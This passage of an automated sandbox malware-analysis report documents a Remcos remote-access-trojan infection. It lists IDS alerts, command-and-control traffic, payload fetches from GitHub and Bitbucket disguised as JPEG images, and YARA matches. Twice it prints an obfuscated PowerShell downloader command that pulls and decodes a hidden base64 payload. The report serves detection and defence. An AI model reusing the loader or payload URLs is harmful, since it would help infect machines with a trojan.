                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49905 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49958 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49978 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49979 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49981 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49982 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49980 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49977 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49983 -> 154.216.18.51:2404
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 185.199.108.133:443 -> 192.168.2.7:49701
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 185.199.108.133:443 -> 192.168.2.7:49701
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.108.133:443 -> 192.168.2.7:49699
                  Source: Malware configuration extractorIPs: 154.216.18.51
                  Source: global trafficTCP traffic: 192.168.2.7:49712 -> 154.216.18.51:2404
                  Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1Host: raw.githubusercontent.com
                  Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                  Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                  Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
                  Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 185.199.108.133:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.199.108.133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041EE6D recv,13_2_0041EE6D
                  Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt HTTP/1.1Host: raw.githubusercontent.com
                  Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: powershell.exe, 00000002.00000002.1731133022.000001ECDAE0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1731133022.000001ECDAD8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000002.00000002.1731133022.000001ECDADDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD540A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD53E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                  Source: powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD5785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD48C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 00000006.00000002.1420244282.000001CFD3CC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/IJEUWAESIKA/nna/refs/heads/main/IFiinmS.txt
                  Source: powershell.exe, 00000002.00000002.1764099594.000001ECF3383000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1731133022.000001ECDB2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFF33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE273000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420078473.000001CFCE454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420192137.000001CFCFD00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1419702608.000001CFCE2EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFCFD11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1420244282.000001CFD4285000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,13_2_0040F4A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,13_2_0040F4A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4A7 SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,ShowWindow,13_2_0040F4A7

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.1cfdff3d3c8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4512, type: MEMORYSTR

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00414D7F SystemParametersInfoW,13_2_00414D7F

                  System Summary

                  barindex
                  Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
